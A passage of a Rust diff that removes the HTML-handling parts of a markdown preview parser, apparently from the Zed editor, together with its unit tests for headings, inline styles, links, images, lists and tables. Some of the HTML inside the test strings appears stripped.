} => { - if !matches!(name.local, local_name!("th") | local_name!("td")) { - return None; - } - - let mut children = MarkdownParagraph::new(); - self.consume_paragraph( - source_range, - node, - &mut children, - &mut Vec::new(), - &mut Vec::new(), - ); - - let is_header = matches!(name.local, local_name!("th")); - - Some(ParsedMarkdownTableColumn { - col_span: std::cmp::max( - Self::attr_value(attrs, local_name!("colspan")) - .and_then(|span| span.parse().ok()) - .unwrap_or(1), - 1, - ), - row_span: std::cmp::max( - Self::attr_value(attrs, local_name!("rowspan")) - .and_then(|span| span.parse().ok()) - .unwrap_or(1), - 1, - ), - is_header, - children, - alignment: Self::attr_value(attrs, local_name!("align")) - .and_then(|align| match align.as_str() { - "left" => Some(ParsedMarkdownTableAlignment::Left), - "center" => Some(ParsedMarkdownTableAlignment::Center), - "right" => Some(ParsedMarkdownTableAlignment::Right), - _ => None, - }) - .unwrap_or_else(|| { - if is_header { - ParsedMarkdownTableAlignment::Center - } else { - ParsedMarkdownTableAlignment::default() - } - }), - }) - } - _ => None, - } - } - - fn consume_children( - &self, - source_range: Range, - node: &Rc, - elements: &mut Vec, - context: &ParseHtmlNodeContext, - ) { - for node in node.children.borrow().iter() { - self.parse_html_node(source_range.clone(), node, elements, context); - } - } - - fn attr_value( - attrs: &RefCell>, - name: html5ever::LocalName, - ) -> Option { - attrs.borrow().iter().find_map(|attr| { - if attr.name.local == name { - Some(attr.value.to_string()) - } else { - None - } - }) - } - - fn markdown_style_from_html_styles( - styles: HashMap, - ) -> Option { - let mut markdown_style = MarkdownHighlightStyle::default(); - - if let Some(text_decoration) = styles.get("text-decoration") { - match text_decoration.to_lowercase().as_str() { - "underline" => { - markdown_style.underline = true; - } - "line-through" => { - markdown_style.strikethrough = true; - } - _ => {} - } - } - - if 
let Some(font_style) = styles.get("font-style") { - match font_style.to_lowercase().as_str() { - "italic" => { - markdown_style.italic = true; - } - "oblique" => { - markdown_style.oblique = true; - } - _ => {} - } - } - - if let Some(font_weight) = styles.get("font-weight") { - match font_weight.to_lowercase().as_str() { - "bold" => { - markdown_style.weight = FontWeight::BOLD; - } - "lighter" => { - markdown_style.weight = FontWeight::THIN; - } - _ => { - if let Some(weight) = font_weight.parse::().ok() { - markdown_style.weight = FontWeight(weight); - } - } - } - } - - if markdown_style != MarkdownHighlightStyle::default() { - Some(markdown_style) - } else { - None - } - } - - fn extract_styles_from_attributes( - attrs: &RefCell>, - ) -> HashMap { - let mut styles = HashMap::new(); - - if let Some(style) = Self::attr_value(attrs, local_name!("style")) { - for decl in style.split(';') { - let mut parts = decl.splitn(2, ':'); - if let Some((key, value)) = parts.next().zip(parts.next()) { - styles.insert( - key.trim().to_lowercase().to_string(), - value.trim().to_string(), - ); - } - } - } - - styles - } - - fn extract_image( - &self, - source_range: Range, - attrs: &RefCell>, - ) -> Option { - let src = Self::attr_value(attrs, local_name!("src"))?; - - let mut image = Image::identify(src, source_range, self.file_location_directory.clone())?; - - if let Some(alt) = Self::attr_value(attrs, local_name!("alt")) { - image.set_alt_text(alt.into()); - } - - let styles = Self::extract_styles_from_attributes(attrs); - - if let Some(width) = Self::attr_value(attrs, local_name!("width")) - .or_else(|| styles.get("width").cloned()) - .and_then(|width| Self::parse_html_element_dimension(&width)) - { - image.set_width(width); - } - - if let Some(height) = Self::attr_value(attrs, local_name!("height")) - .or_else(|| styles.get("height").cloned()) - .and_then(|height| Self::parse_html_element_dimension(&height)) - { - image.set_height(height); - } - - Some(image) - } - - fn 
extract_html_list( - &self, - node: &Rc, - ordered: bool, - depth: u16, - source_range: Range, - ) -> Option> { - let mut list_items = Vec::with_capacity(node.children.borrow().len()); - - for (index, node) in node.children.borrow().iter().enumerate() { - match &node.data { - markup5ever_rcdom::NodeData::Element { name, .. } => { - if local_name!("li") != name.local { - continue; - } - - let mut content = Vec::new(); - self.consume_children( - source_range.clone(), - node, - &mut content, - &ParseHtmlNodeContext { - list_item_depth: depth + 1, - }, - ); - - if !content.is_empty() { - list_items.push(ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - depth, - source_range: source_range.clone(), - item_type: if ordered { - ParsedMarkdownListItemType::Ordered(index as u64 + 1) - } else { - ParsedMarkdownListItemType::Unordered - }, - content, - nested: true, - })); - } - } - _ => {} - } - } - - if list_items.is_empty() { - None - } else { - Some(list_items) - } - } - - fn parse_html_element_dimension(value: &str) -> Option { - if value.ends_with("%") { - value - .trim_end_matches("%") - .parse::() - .ok() - .map(|value| relative(value / 100.)) - } else { - value - .trim_end_matches("px") - .parse() - .ok() - .map(|value| px(value).into()) - } - } - - fn extract_html_blockquote( - &self, - node: &Rc, - source_range: Range, - ) -> Option { - let mut children = Vec::new(); - self.consume_children( - source_range.clone(), - node, - &mut children, - &ParseHtmlNodeContext::default(), - ); - - if children.is_empty() { - None - } else { - Some(ParsedMarkdownBlockQuote { - children, - source_range, - }) - } - } - - fn extract_html_table( - &self, - node: &Rc, - source_range: Range, - ) -> Option { - let mut header_rows = Vec::new(); - let mut body_rows = Vec::new(); - let mut caption = None; - - // node should be a thead, tbody or caption element - for node in node.children.borrow().iter() { - match &node.data { - markup5ever_rcdom::NodeData::Element { name, .. 
} => { - if local_name!("caption") == name.local { - let mut paragraph = MarkdownParagraph::new(); - self.parse_paragraph( - source_range.clone(), - node, - &mut paragraph, - &mut Vec::new(), - &mut Vec::new(), - ); - caption = Some(paragraph); - } - if local_name!("thead") == name.local { - // node should be a tr element - for node in node.children.borrow().iter() { - if let Some(row) = self.parse_table_row(source_range.clone(), node) { - header_rows.push(row); - } - } - } else if local_name!("tbody") == name.local { - // node should be a tr element - for node in node.children.borrow().iter() { - if let Some(row) = self.parse_table_row(source_range.clone(), node) { - body_rows.push(row); - } - } - } - } - _ => {} - } - } - - if !header_rows.is_empty() || !body_rows.is_empty() { - Some(ParsedMarkdownTable { - source_range, - body: body_rows, - header: header_rows, - caption, - }) - } else { - None - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use ParsedMarkdownListItemType::*; - use core::panic; - use gpui::{AbsoluteLength, BackgroundExecutor, DefiniteLength}; - use language::{HighlightId, LanguageRegistry}; - use pretty_assertions::assert_eq; - - async fn parse(input: &str) -> ParsedMarkdown { - parse_markdown(input, None, None).await - } - - #[gpui::test] - async fn test_headings() { - let parsed = parse("# Heading one\n## Heading two\n### Heading three").await; - - assert_eq!( - parsed.children, - vec![ - h1(text("Heading one", 2..13), 0..14), - h2(text("Heading two", 17..28), 14..29), - h3(text("Heading three", 33..46), 29..46), - ] - ); - } - - #[gpui::test] - async fn test_newlines_dont_new_paragraphs() { - let parsed = parse("Some text **that is bolded**\n and *italicized*").await; - - assert_eq!( - parsed.children, - vec![p("Some text that is bolded and italicized", 0..46)] - ); - } - - #[gpui::test] - async fn test_heading_with_paragraph() { - let parsed = parse("# Zed\nThe editor").await; - - assert_eq!( - parsed.children, - 
vec![h1(text("Zed", 2..5), 0..6), p("The editor", 6..16),] - ); - } - - #[gpui::test] - async fn test_double_newlines_do_new_paragraphs() { - let parsed = parse("Some text **that is bolded**\n\n and *italicized*").await; - - assert_eq!( - parsed.children, - vec![ - p("Some text that is bolded", 0..29), - p("and italicized", 31..47), - ] - ); - } - - #[gpui::test] - async fn test_bold_italic_text() { - let parsed = parse("Some text **that is bolded** and *italicized*").await; - - assert_eq!( - parsed.children, - vec![p("Some text that is bolded and italicized", 0..45)] - ); - } - - #[gpui::test] - async fn test_nested_bold_strikethrough_text() { - let parsed = parse("Some **bo~~strikethrough~~ld** text").await; - - assert_eq!(parsed.children.len(), 1); - assert_eq!( - parsed.children[0], - ParsedMarkdownElement::Paragraph(vec![MarkdownParagraphChunk::Text( - ParsedMarkdownText { - source_range: 0..35, - contents: "Some bostrikethroughld text".into(), - highlights: Vec::new(), - regions: Vec::new(), - } - )]) - ); - - let new_text = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - - let paragraph = if let MarkdownParagraphChunk::Text(text) = &new_text[0] { - text - } else { - panic!("Expected a text"); - }; - - assert_eq!( - paragraph.highlights, - vec![ - ( - 5..7, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - ..Default::default() - }), - ), - ( - 7..20, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - strikethrough: true, - ..Default::default() - }), - ), - ( - 20..22, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - ..Default::default() - }), - ), - ] - ); - } - - #[gpui::test] - async fn test_html_inline_style_elements() { - let parsed = - parse("

Some text strong text more text bold text more text italic text more text emphasized text more text deleted text more text inserted text

").await; - - assert_eq!(1, parsed.children.len()); - let chunks = if let ParsedMarkdownElement::Paragraph(chunks) = &parsed.children[0] { - chunks - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(1, chunks.len()); - let text = if let MarkdownParagraphChunk::Text(text) = &chunks[0] { - text - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(0..205, text.source_range); - assert_eq!( - "Some text strong text more text bold text more text italic text more text emphasized text more text deleted text more text inserted text", - text.contents.as_str(), - ); - assert_eq!( - vec![ - ( - 10..21, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight(700.0), - ..Default::default() - },), - ), - ( - 32..41, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight(700.0), - ..Default::default() - },), - ), - ( - 52..63, - MarkdownHighlight::Style(MarkdownHighlightStyle { - italic: true, - weight: FontWeight(400.0), - ..Default::default() - },), - ), - ( - 74..89, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight(400.0), - oblique: true, - ..Default::default() - },), - ), - ( - 100..112, - MarkdownHighlight::Style(MarkdownHighlightStyle { - strikethrough: true, - weight: FontWeight(400.0), - ..Default::default() - },), - ), - ( - 123..136, - MarkdownHighlight::Style(MarkdownHighlightStyle { - underline: true, - weight: FontWeight(400.0,), - ..Default::default() - },), - ), - ], - text.highlights - ); - } - - #[gpui::test] - async fn test_html_href_element() { - let parsed = - parse("

Some text link more text

").await; - - assert_eq!(1, parsed.children.len()); - let chunks = if let ParsedMarkdownElement::Paragraph(chunks) = &parsed.children[0] { - chunks - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(1, chunks.len()); - let text = if let MarkdownParagraphChunk::Text(text) = &chunks[0] { - text - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(0..65, text.source_range); - assert_eq!("Some text link more text", text.contents.as_str(),); - assert_eq!( - vec![( - 10..14, - MarkdownHighlight::Style(MarkdownHighlightStyle { - link: true, - ..Default::default() - },), - )], - text.highlights - ); - assert_eq!( - vec![( - 10..14, - ParsedRegion { - code: false, - link: Some(Link::Web { - url: "https://example.com".into() - }) - } - )], - text.regions - ) - } - - #[gpui::test] - async fn test_text_with_inline_html() { - let parsed = parse("This is a paragraph with an inline HTML tag.").await; - - assert_eq!( - parsed.children, - vec![p("This is a paragraph with an inline HTML tag.", 0..63),], - ); - } - - #[gpui::test] - async fn test_raw_links_detection() { - let parsed = parse("Checkout this https://zed.dev link").await; - - assert_eq!( - parsed.children, - vec![p("Checkout this https://zed.dev link", 0..34)] - ); - } - - #[gpui::test] - async fn test_empty_image() { - let parsed = parse("![]()").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!(paragraph.len(), 0); - } - - #[gpui::test] - async fn test_image_links_detection() { - let parsed = parse("![test](https://blog.logrocket.com/wp-content/uploads/2024/04/exploring-zed-open-source-code-editor-rust-2.png)").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - paragraph[0], - MarkdownParagraphChunk::Image(Image { - source_range: 0..111, - link: Link::Web { - 
url: "https://blog.logrocket.com/wp-content/uploads/2024/04/exploring-zed-open-source-code-editor-rust-2.png".to_string(), - }, - alt_text: Some("test".into()), - height: None, - width: None, - },) - ); - } - - #[gpui::test] - async fn test_image_alt_text() { - let parsed = parse("[![Zed](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/zed-industries/zed/main/assets/badge/v0.json)](https://zed.dev)\n ").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - paragraph[0], - MarkdownParagraphChunk::Image(Image { - source_range: 0..142, - link: Link::Web { - url: "https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/zed-industries/zed/main/assets/badge/v0.json".to_string(), - }, - alt_text: Some("Zed".into()), - height: None, - width: None, - },) - ); - } - - #[gpui::test] - async fn test_image_without_alt_text() { - let parsed = parse("![](http://example.com/foo.png)").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - paragraph[0], - MarkdownParagraphChunk::Image(Image { - source_range: 0..31, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: None, - width: None, - },) - ); - } - - #[gpui::test] - async fn test_image_with_alt_text_containing_formatting() { - let parsed = parse("![foo *bar* baz](http://example.com/foo.png)").await; - - let ParsedMarkdownElement::Paragraph(chunks) = &parsed.children[0] else { - panic!("Expected a paragraph"); - }; - assert_eq!( - chunks, - &[MarkdownParagraphChunk::Image(Image { - source_range: 0..44, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: Some("foo bar baz".into()), - height: None, - width: None, - }),], - ); - } - - #[gpui::test] - async fn 
test_images_with_text_in_between() { - let parsed = parse( - "![foo](http://example.com/foo.png)\nLorem Ipsum\n![bar](http://example.com/bar.png)", - ) - .await; - - let chunks = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - chunks, - &vec![ - MarkdownParagraphChunk::Image(Image { - source_range: 0..81, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: Some("foo".into()), - height: None, - width: None, - }), - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..81, - contents: " Lorem Ipsum ".into(), - highlights: Vec::new(), - regions: Vec::new(), - }), - MarkdownParagraphChunk::Image(Image { - source_range: 0..81, - link: Link::Web { - url: "http://example.com/bar.png".to_string(), - }, - alt_text: Some("bar".into()), - height: None, - width: None, - }) - ] - ); - } - - #[test] - fn test_parse_html_element_dimension() { - // Test percentage values - assert_eq!( - MarkdownParser::parse_html_element_dimension("50%"), - Some(DefiniteLength::Fraction(0.5)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("100%"), - Some(DefiniteLength::Fraction(1.0)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("25%"), - Some(DefiniteLength::Fraction(0.25)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("0%"), - Some(DefiniteLength::Fraction(0.0)) - ); - - // Test pixel values - assert_eq!( - MarkdownParser::parse_html_element_dimension("100px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.0)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("50px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(50.0)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("0px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(0.0)))) - ); - - // Test values without units (should be treated as pixels) - assert_eq!( - 
MarkdownParser::parse_html_element_dimension("100"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.0)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("42"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(42.0)))) - ); - - // Test invalid values - assert_eq!( - MarkdownParser::parse_html_element_dimension("invalid"), - None - ); - assert_eq!(MarkdownParser::parse_html_element_dimension("px"), None); - assert_eq!(MarkdownParser::parse_html_element_dimension("%"), None); - assert_eq!(MarkdownParser::parse_html_element_dimension(""), None); - assert_eq!(MarkdownParser::parse_html_element_dimension("abc%"), None); - assert_eq!(MarkdownParser::parse_html_element_dimension("abcpx"), None); - - // Test decimal values - assert_eq!( - MarkdownParser::parse_html_element_dimension("50.5%"), - Some(DefiniteLength::Fraction(0.505)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("100.25px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.25)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("42.0"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(42.0)))) - ); - } - - #[gpui::test] - async fn test_html_unordered_list() { - let parsed = parse( - "
    -
  • Item 1
  • -
  • Item 2
  • -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..82))] - ), - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Item 2", 0..82))] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_ordered_list() { - let parsed = parse( - "
    -
  1. Item 1
  2. -
  3. Item 2
  4. -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Ordered(1), - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..82))] - ), - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Ordered(2), - vec![ParsedMarkdownElement::Paragraph(text("Item 2", 0..82))] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_nested_ordered_list() { - let parsed = parse( - "
    -
  1. Item 1
  2. -
  3. Item 2 -
      -
    1. Sub-Item 1
    2. -
    3. Sub-Item 2
    4. -
    -
  4. -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Ordered(1), - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Ordered(2), - vec![ - ParsedMarkdownElement::Paragraph(text("Item 2", 0..216)), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Ordered(1), - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Ordered(2), - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 2", 0..216))] - ), - ] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_nested_unordered_list() { - let parsed = parse( - "
    -
  • Item 1
  • -
  • Item 2 -
      -
    • Sub-Item 1
    • -
    • Sub-Item 2
    • -
    -
  • -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ - ParsedMarkdownElement::Paragraph(text("Item 2", 0..216)), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 2", 0..216))] - ), - ] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_inline_html_image_tag() { - let parsed = - parse("

Some text some more text

") - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Paragraph(vec![ - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..71, - contents: "Some text".into(), - highlights: Default::default(), - regions: Default::default() - }), - MarkdownParagraphChunk::Image(Image { - source_range: 0..71, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: None, - width: None, - }), - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..71, - contents: " some more text".into(), - highlights: Default::default(), - regions: Default::default() - }), - ])] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_block_quote() { - let parsed = parse( - "
-

some description

-
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![block_quote( - vec![ParsedMarkdownElement::Paragraph(text( - "some description", - 0..78 - ))], - 0..78, - )] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_nested_block_quote() { - let parsed = parse( - "
-

some description

-
-

second description

-
-
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![block_quote( - vec![ - ParsedMarkdownElement::Paragraph(text("some description", 0..179)), - block_quote( - vec![ParsedMarkdownElement::Paragraph(text( - "second description", - 0..179 - ))], - 0..179, - ) - ], - 0..179, - )] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table() { - let parsed = parse( - " - - - - - - - - - - - - - - - - -
IdName
1Chris
2Dennis
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..366, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Id", 0..366), - ParsedMarkdownTableAlignment::Center - ), - column( - 1, - 1, - true, - text("Name ", 0..366), - ParsedMarkdownTableAlignment::Center - ) - ])], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("1", 0..366), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Chris", 0..366), - ParsedMarkdownTableAlignment::None - ) - ]), - row(vec![ - column( - 1, - 1, - false, - text("2", 0..366), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Dennis", 0..366), - ParsedMarkdownTableAlignment::None - ) - ]), - ], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table_with_caption() { - let parsed = parse( - " - - - - - - - - - - - -
My Table
1Chris
2Dennis
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..280, - Some(vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..280, - contents: "My Table".into(), - highlights: Default::default(), - regions: Default::default() - })]), - vec![], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("1", 0..280), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Chris", 0..280), - ParsedMarkdownTableAlignment::None - ) - ]), - row(vec![ - column( - 1, - 1, - false, - text("2", 0..280), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Dennis", 0..280), - ParsedMarkdownTableAlignment::None - ) - ]), - ], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table_without_headings() { - let parsed = parse( - " - - - - - - - - - - -
1Chris
2Dennis
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..240, - None, - vec![], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("1", 0..240), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Chris", 0..240), - ParsedMarkdownTableAlignment::None - ) - ]), - row(vec![ - column( - 1, - 1, - false, - text("2", 0..240), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Dennis", 0..240), - ParsedMarkdownTableAlignment::None - ) - ]), - ], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table_without_body() { - let parsed = parse( - " - - - - - - -
IdName
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..150, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Id", 0..150), - ParsedMarkdownTableAlignment::Center - ), - column( - 1, - 1, - true, - text("Name", 0..150), - ParsedMarkdownTableAlignment::Center - ) - ])], - vec![], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_heading_tags() { - let parsed = parse("

Heading

Heading

Heading

Heading

Heading
Heading
").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H1, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H2, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H3, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H4, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H5, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H6, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_tag() { - let parsed = parse("").await; - - assert_eq!( - ParsedMarkdown { - children: 
vec![ParsedMarkdownElement::Image(Image { - source_range: 0..40, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: None, - width: None, - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_tag_with_alt_text() { - let parsed = parse("\"Foo\"").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..50, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: Some("Foo".into()), - height: None, - width: None, - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_tag_with_height_and_width() { - let parsed = - parse("").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..65, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.)))), - width: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(200.)))), - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_style_tag_with_height_and_width() { - let parsed = parse( - "", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..75, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.)))), - width: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(200.)))), - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_header_only_table() { - let markdown = "\ -| Header 1 | Header 2 | -|----------|----------| - -Some other content -"; - - let expected_table = table( - 0..48, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Header 1", 1..11), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - true, - text("Header 2", 12..22), - 
ParsedMarkdownTableAlignment::None, - ), - ])], - vec![], - ); - - assert_eq!( - parse(markdown).await.children[0], - ParsedMarkdownElement::Table(expected_table) - ); - } - - #[gpui::test] - async fn test_basic_table() { - let markdown = "\ -| Header 1 | Header 2 | -|----------|----------| -| Cell 1 | Cell 2 | -| Cell 3 | Cell 4 |"; - - let expected_table = table( - 0..95, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Header 1", 1..11), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - true, - text("Header 2", 12..22), - ParsedMarkdownTableAlignment::None, - ), - ])], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("Cell 1", 49..59), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - false, - text("Cell 2", 60..70), - ParsedMarkdownTableAlignment::None, - ), - ]), - row(vec![ - column( - 1, - 1, - false, - text("Cell 3", 73..83), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - false, - text("Cell 4", 84..94), - ParsedMarkdownTableAlignment::None, - ), - ]), - ], - ); - - assert_eq!( - parse(markdown).await.children[0], - ParsedMarkdownElement::Table(expected_table) - ); - } - - #[gpui::test] - async fn test_list_basic() { - let parsed = parse( - "\ -* Item 1 -* Item 2 -* Item 3 -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..8, 1, Unordered, vec![p("Item 1", 2..8)]), - list_item(9..17, 1, Unordered, vec![p("Item 2", 11..17)]), - list_item(18..26, 1, Unordered, vec![p("Item 3", 20..26)]), - ], - ); - } - - #[gpui::test] - async fn test_list_with_tasks() { - let parsed = parse( - "\ -- [ ] TODO -- [x] Checked -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..10, 1, Task(false, 2..5), vec![p("TODO", 6..10)]), - list_item(11..24, 1, Task(true, 13..16), vec![p("Checked", 17..24)]), - ], - ); - } - - #[gpui::test] - async fn test_list_with_indented_task() { - let parsed = parse( - "\ -- [ ] TODO - - [x] Checked - - Unordered - 1. Number 1 - 